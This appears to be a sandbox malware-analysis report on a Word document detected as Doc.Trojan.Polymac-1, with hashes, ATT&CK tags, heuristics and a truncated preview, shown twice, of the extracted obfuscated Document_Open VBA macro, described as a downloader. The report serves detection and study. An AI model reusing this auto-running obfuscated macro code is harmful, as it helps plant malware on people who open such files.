Office (OLE) malware analysis — malicious · 1999ae34c4afd7db

MALICIOUS

Office (OLE)

137.5 KB Created: 1999-11-09 00:43:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: a2d9a0c7d3a2ce15776665c621754a23 SHA-1: 27503e602ea47d8bb8a9d02f433530079dd1a3bb SHA-256: 1999ae34c4afd7db42f766645666fafee411653d2833737da2d524b41f5a4bc3

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an OLE document containing a VBA macro that is automatically executed via the Document_Open subroutine. The macro appears to be heavily obfuscated, but its intent is to download and execute a secondary payload. The ClamAV detection name 'Doc.Trojan.Polymac-1' further supports its malicious nature.

Heuristics 3

ClamAV: Doc.Trojan.Polymac-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Polymac-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 243730 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	243730 bytes
SHA-256: `c2410a797d2d845c1137e168f69c2965a88e33e468b000023376caff9698b044`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() W8YdvUSc1 = 0: Do While W8YdvUSc1 < 22: W8YdvUSc1 = W8YdvUSc1 + 7: Loop yMpAoI8 = "э{r'’ЇцљcеУ5{ТZЮnlu%¬�яХCх™<2·" + Chr$(25) + "щbg >ћІйЯ=љ–EPС@жbj4" + Chr$(6) + "ћв¤љRй‘VFЯ\ЩPaz5њ¬ј•cЭч" + Chr$(24) + "5љkОber" + Chr$(34) + "‡Ірк_ьИxPПI" qkMY8XjRfh7 = 7: Do While qkMY8XjRfh7 < 60 qkMY8XjRfh7 = qkMY8XjRfh7 + 5 Loop: yMpAoI8 = yMpAoI8 + "ГjjV0ђ©ьщ_фФPQЪPЕf)3" + Chr$(3) + "Ј–Ря" + Chr$(25) + "°З$" + Chr$(17) + "Џ" + Chr$(25) + "Юpl \щьФИUхЕ\|QЪJ‹wf;2Љ№цИCшРqPКyЖb`w Ѓ®ћ°" + Chr$(23) + "УЩp\Ц" + Chr$(25) + "Дv};7њ©іФUз‘cZПJ" aMh2FnBvy2 = IPFHTf7 - OUuRHp4 yMpAoI8 = yMpAoI8 + "ВlghqНбѕ“=љ‘VMоMЩ#4;6–ЇэЫ]х™<2·" + Chr$(25) + "шf}Z%‡©іф_вЬtSй\Жsez%–хГЫDш‘>" + Chr$(31) + "џe‰#" + Chr$(34) + ";" + Chr$(31) + "" IhO3OvBH6 = 0 Do IhO3OvBH6 = IhO3OvBH6 + 5 Loop While IhO3OvBH6 < 56: yMpAoI8 = yMpAoI8 + "њ©юЫ\ДФxOСXЯf%;aюСінYдЩ5~НIЗjjz%љґэ·:°‘;zУXЙolX0ќёцЦ{хИ5" + Chr$(2) + "ќ Кoz~\щыі”cуГpZУlЫgho8ќјі‡" + Chr$(16) lu1kvrHU5 = 3 Do: lu1kvrHU5 = lu1kvrHU5 + 3 Loop While lu1kvrHU5 < 43: yMpAoI8 = yMpAoI8 + "ЦРyLШ4Ў#)5" + Chr$(2) + "›ґдмYгДtSяXШjj^5љЇьИ" + Chr$(16) + "‘S^СJО" + Chr$(14) + Chr$(3) + ";" + Chr$(20) + "ќїінYд" mhuHMoP8Mn0 = 2 Do While mhuHMoP8Mn0 < 12 mhuHMoP8Mn0 = mhuHMoP8Mn0 + 10: Loop: yMpAoI8 = yMpAoI8 + "Щ" + Chr$(24) + "5ќnВwa;" + Chr$(30) + "ѓЇъХ^гј" + Chr$(31) + Chr$(31) + "ќ" + Chr$(23) + "иlg}8Ѓ¶РХ^жФgLФVЕp)&qµєяЙUќ»5" + Chr$(31) l4oUiaCL2 = 0 Do Until l4oUiaCL2 > 19 l4oUiaCL2 = l4oUiaCL2 + 8: Loop yMpAoI8 = yMpAoI8 + "“jКulU>Ѓ¶тЦ`вЮxOЙ" + Chr$(25) + "–#Oz=Ђѕћ°" + Chr$(16) + "°џCVПLШS{t%–ёзУ_ю‘(" + Chr$(31) + "ыXЗpl" + Chr$(22) + "[УћэЮ" + Chr$(16) + "ЗШaW°3‹@hw=УёьЧ@щЭp" + Chr$(23) z7yXcslft4 = 5 Do While z7yXcslft4 < 57: z7yXcslft4 = z7yXcslft4 + 3 Loop yMpAoI8 = yMpAoI8 + "юKТs}~5 ЇбУ^чќ5MЊ" + Chr$(8) + "‡#{)`Яыб€" + Chr$(3) + "ј‘VMоMЩ" + Chr$(4) + Chr$(17) + "q°©кКDхХF" + Chr$(31) + "Ђ" + Chr$(25) + "‰S{r'’ЇцљcеУ5{ТZЮnlu%¬”гЯ^ё�7" + Chr$(31) + "–" + Chr$(25) + "" For GsUwqDM6ZE7 = 5 To 55 Step 1: Next: yMpAoI8 = yMpAoI8 + "иk{?yВиєљ" + Chr$(27) + "°т}M™" + Chr$(17) + "љ3" + Chr$(32) + Chr$(22) + "[У�тЦ\°Ш{LШKЯWfO4‹Ї»щBйБaZЩjЯq`u6Яыб‹" + Chr$(1) If sH8 <= b3 Then End If yMpAoI8 = yMpAoI8 + "ј‘g" + Chr$(13) + "Њ" + Chr$(21) + "‹q;(}У�бйDвќ5\|П@Ыwl " + Chr$(2) + "ЪЦ™љsвИeKШ]ш#4;" + Chr$(18) ixQASNF5rA0 = 8: Do Until ixQASNF5rA0 > 22: ixQASNF5rA0 = ixQASNF5rA0 + 4: Loop: yMpAoI8 = yMpAoI8 + "ЃўгОUфв5" + Chr$(20) + "ќzГq-3`Аті‘" + Chr$(16) + "УЩg" + Chr$(27) + "•" + Chr$(8) + "›)0qСћэЮ" + Chr$(16) + "ГДw" + Chr$(29) + "ќ" + Chr$(18) + "‹@aiuЫк “=љ‘FZЙ" + Chr$(25) + "еW)&qЅ" If ASmLE1 <= Rnd * 72 Then End If yMpAoI8 = yMpAoI8 + "ґбЧQьеpRНUКwl5" + Chr$(7) + "±‹бХZхТa" + Chr$(17) + "л{иldk>ќѕэОCёЂ<" + Chr$(17) + "юVПfDt5†·ц·:°шs" + Chr$(31) + "уm…o`u4Ђу" kcfmlyb5HQlXy4 = 6 Do kcfmlyb5HQlXy4 = kcfmlyb5HQlXy4 + 6: Loop While kcfmlyb5HQlXy4 < 14: yMpAoI8 = yMpAoI8 + "ў–" + Chr$(16) + "Ў�5" + Chr$(2) + "ќ" + Chr$(27) + "‰#]s4ќыЭо" + Chr$(30) + "ЩЯfZПMЗjg~" + Chr$(34) + "УкїљsвИeKШ]ш" + Chr$(14) If TS0 < e1 Then End If yMpAoI8 = yMpAoI8 + Chr$(3) + ";" + Chr$(24) + "•ыЧХSеЬpQЙJ…@fn?‡ыљ" + Chr$(1) + "°е}ZУ4Ў#)z7•ы®љqуЕ\|IШ}Д`\|v4ќЇћ°" + Chr$(16) + "°чzMќ\|К`a;0·ґрљyю‘QPЮLЖf" For KgWzA8yxhBiG2 = 3 To 46 Step 6 Next yMpAoI8 = yMpAoI8 + "go" + Chr$(34) + "юСіљ" + Chr$(16) + "ЩЧ5^щVИ-Gz<–ыЇ„" + Chr$(16) + "сЧs" + Chr$(31) + "йQОm" + Chr$(4) For usQ0nAUQoeS3 = 7 To 25 Step 7 Next yMpAoI8 = yMpAoI8 + Chr$(17) + "qУыію_уДxZУMШ" + Chr$(43) + "h_>ђхЭЫ]х�;~ЮMВuho4юСіљ" + Chr$(16) + "°вpKќxп#4;" + Chr$(16) + "ђЇъМUФЮvJР\Еw'M" + Chr$(19) + "Ј©ьРUуЕ;iяzДnyt?–µзЙ" x7o5 = 4 Do: x7o5 = x7o5 + 8 Loop While x7o5 < 15: yMpAoI8 = yMpAoI8 + Chr$(24) + "Ў�;\|Т]ОNf $џѕћ°" + Chr$(16) + "°‘5vЫ" + Chr$(25) + "кG'w8ќѕа’" + Chr$(1) + "ј‘$" + Chr$(22) C0lCKa8 = 4 Do: C0lCKa8 = C0lCKa8 + 1 Loop Until ... (truncated)

SHA-256: c2410a797d2d845c1137e168f69c2965a88e33e468b000023376caff9698b044

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
W8YdvUSc1 = 0: Do While W8YdvUSc1 < 22: W8YdvUSc1 = W8YdvUSc1 + 7: Loop

yMpAoI8 = "э{r'’ЇцљcеУ5{ТZЮnlu%¬�яХCх™<2·" + Chr$(25) + "щbg >ћІйЯ=љ–EPС@жbj4" + Chr$(6) + "ћв¤љRй‘VFЯ\ЩPaz5њ¬ј•cЭч" + Chr$(24) + "5љkОber" + Chr$(34) + "‡Ірк_ьИxPПI"
qkMY8XjRfh7 = 7: Do While qkMY8XjRfh7 < 60
qkMY8XjRfh7 = qkMY8XjRfh7 + 5
Loop:
yMpAoI8 = yMpAoI8 + "ГjjV0ђ©ьщ_фФPQЪPЕf)3" + Chr$(3) + "Ј–Ря" + Chr$(25) + "°З$" + Chr$(17) + "Џ" + Chr$(25) + "Юpl \щьФИUхЕ|QЪJ‹wf;2Љ№цИCшРqPКyЖb`w Ѓ®ћ°" + Chr$(23) + "УЩp\Ц" + Chr$(25) + "Дv};7њ©іФUз‘cZПJ"
aMh2FnBvy2 = IPFHTf7 - OUuRHp4

yMpAoI8 = yMpAoI8 + "ВlghqНбѕ“=љ‘VMоMЩ#4;6–ЇэЫ]х™<2·" + Chr$(25) + "шf}Z%‡©іф_вЬtSй\Жsez%–хГЫDш‘>" + Chr$(31) + "џe‰#" + Chr$(34) + ";" + Chr$(31) + ""
IhO3OvBH6 = 0
Do
IhO3OvBH6 = IhO3OvBH6 + 5
Loop While IhO3OvBH6 < 56:
yMpAoI8 = yMpAoI8 + "њ©юЫ\ДФxOСXЯf%;aюСінYдЩ5~НIЗjjz%љґэ·:°‘;zУXЙolX0ќёцЦ{хИ5" + Chr$(2) + "ќ Кoz~\щыі”cуГpZУlЫgho8ќјі‡" + Chr$(16)
lu1kvrHU5 = 3
Do: lu1kvrHU5 = lu1kvrHU5 + 3
Loop While lu1kvrHU5 < 43:
yMpAoI8 = yMpAoI8 + "ЦРyLШ4Ў#)5" + Chr$(2) + "›ґдмYгДtSяXШjj^5љЇьИ" + Chr$(16) + "‘S^СJО" + Chr$(14) + Chr$(3) + ";" + Chr$(20) + "ќїінYд"
mhuHMoP8Mn0 = 2
Do While mhuHMoP8Mn0 < 12
mhuHMoP8Mn0 = mhuHMoP8Mn0 + 10: Loop:
yMpAoI8 = yMpAoI8 + "Щ" + Chr$(24) + "5ќnВwa;" + Chr$(30) + "ѓЇъХ^гј" + Chr$(31) + Chr$(31) + "ќ" + Chr$(23) + "иlg}8Ѓ¶РХ^жФgLФVЕp)&qµєяЙUќ»5" + Chr$(31)
l4oUiaCL2 = 0
Do Until l4oUiaCL2 > 19
l4oUiaCL2 = l4oUiaCL2 + 8: Loop

yMpAoI8 = yMpAoI8 + "“jКulU>Ѓ¶тЦ`вЮxOЙ" + Chr$(25) + "–#Oz=Ђѕћ°" + Chr$(16) + "°џCVПLШS{t%–ёзУ_ю‘(" + Chr$(31) + "ыXЗpl" + Chr$(22) + "[УћэЮ" + Chr$(16) + "ЗШaW°3‹@hw=УёьЧ@щЭp" + Chr$(23)
z7yXcslft4 = 5
Do While z7yXcslft4 < 57: z7yXcslft4 = z7yXcslft4 + 3
Loop

yMpAoI8 = yMpAoI8 + "юKТs}~5 ЇбУ^чќ5MЊ" + Chr$(8) + "‡#{)`Яыб€" + Chr$(3) + "ј‘VMоMЩ*" + Chr$(4) + Chr$(17) + "q°©кКDхХF" + Chr$(31) + "Ђ" + Chr$(25) + "‰S{r'’ЇцљcеУ5{ТZЮnlu%¬”гЯ^ё�7" + Chr$(31) + "–" + Chr$(25) + ""
For GsUwqDM6ZE7 = 5 To 55 Step 1: Next:
yMpAoI8 = yMpAoI8 + "иk{?yВиєљ" + Chr$(27) + "°т}M™" + Chr$(17) + "љ3" + Chr$(32) + Chr$(22) + "[У�тЦ\°Ш{LШKЯWfO4‹Ї»щBйБaZЩjЯq`u6Яыб‹" + Chr$(1)

If sH8 <= b3 Then

End If

yMpAoI8 = yMpAoI8 + "ј‘g" + Chr$(13) + "Њ" + Chr$(21) + "‹q;(}У�бйDвќ5|П@Ыwl " + Chr$(2) + "ЪЦ™љsвИeKШ]ш#4;" + Chr$(18)
ixQASNF5rA0 = 8: Do Until ixQASNF5rA0 > 22: ixQASNF5rA0 = ixQASNF5rA0 + 4: Loop:
yMpAoI8 = yMpAoI8 + "ЃўгОUфв5" + Chr$(20) + "ќzГq-3`Аті‘" + Chr$(16) + "УЩg" + Chr$(27) + "•" + Chr$(8) + "›*)0qСћэЮ" + Chr$(16) + "ГДw" + Chr$(29) + "ќ" + Chr$(18) + "‹@aiuЫк “=љ‘FZЙ" + Chr$(25) + "еW)&qЅ"

If ASmLE1 <= Rnd * 72 Then

End If

yMpAoI8 = yMpAoI8 + "ґбЧQьеpRНUКwl5" + Chr$(7) + "±‹бХZхТa" + Chr$(17) + "л{иldk>ќѕэОCёЂ<" + Chr$(17) + "юVПfDt5†·ц·:°шs" + Chr$(31) + "уm…o`u4Ђу"
kcfmlyb5HQlXy4 = 6
Do
kcfmlyb5HQlXy4 = kcfmlyb5HQlXy4 + 6: Loop While kcfmlyb5HQlXy4 < 14:
yMpAoI8 = yMpAoI8 + "ў–" + Chr$(16) + "Ў�5" + Chr$(2) + "ќ" + Chr$(27) + "‰#]s4ќыЭо" + Chr$(30) + "ЩЯfZПMЗjg~" + Chr$(34) + "УкїљsвИeKШ]ш" + Chr$(14)

If TS0 < e1 Then

End If

yMpAoI8 = yMpAoI8 + Chr$(3) + ";" + Chr$(24) + "•ыЧХSеЬpQЙJ…@fn?‡ыљ" + Chr$(1) + "°е}ZУ4Ў#)z7•ы®љqуЕ|IШ}Д`|v4ќЇћ°" + Chr$(16) + "°чzMќ|К`a;0·ґрљyю‘QPЮLЖf"
For KgWzA8yxhBiG2 = 3 To 46 Step 6
Next

yMpAoI8 = yMpAoI8 + "go" + Chr$(34) + "юСіљ" + Chr$(16) + "ЩЧ5^щVИ-Gz<–ыЇ„" + Chr$(16) + "сЧs" + Chr$(31) + "йQОm" + Chr$(4)
For usQ0nAUQoeS3 = 7 To 25 Step 7
Next

yMpAoI8 = yMpAoI8 + Chr$(17) + "qУыію_уДxZУMШ" + Chr$(43) + "h_>ђхЭЫ]х�;~ЮMВuho4юСіљ" + Chr$(16) + "°вpKќxп#4;" + Chr$(16) + "ђЇъМUФЮvJР\Еw'M" + Chr$(19) + "Ј©ьРUуЕ;iяzДnyt?–µзЙ"
x7o5 = 4
Do: x7o5 = x7o5 + 8
Loop While x7o5 < 15:
yMpAoI8 = yMpAoI8 + Chr$(24) + "Ў�;|Т]ОNf $џѕћ°" + Chr$(16) + "°‘5vЫ" + Chr$(25) + "кG'w8ќѕа’" + Chr$(1) + "ј‘$" + Chr$(22)
C0lCKa8 = 4
Do: C0lCKa8 = C0lCKa8 + 1
Loop Until 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.